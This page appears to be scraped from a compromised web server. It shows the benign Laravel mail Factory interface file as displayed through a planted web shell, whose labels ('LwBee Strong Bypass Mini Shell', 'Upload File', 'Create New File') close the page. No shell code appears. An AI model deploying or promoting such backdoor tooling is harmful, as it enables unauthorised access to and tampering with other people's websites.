/home/aloic1/public_html/core/vendor/laravel/framework/src/Illuminate/Contracts/Mail/Factory.php
<?php

namespace Illuminate\Contracts\Mail;

interface Factory
{
    /**
     * Get a mailer instance by name.
     *
     * @param  string|null  $name
     * @return \Illuminate\Contracts\Mail\Mailer
     */
    public function mailer($name = null);
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File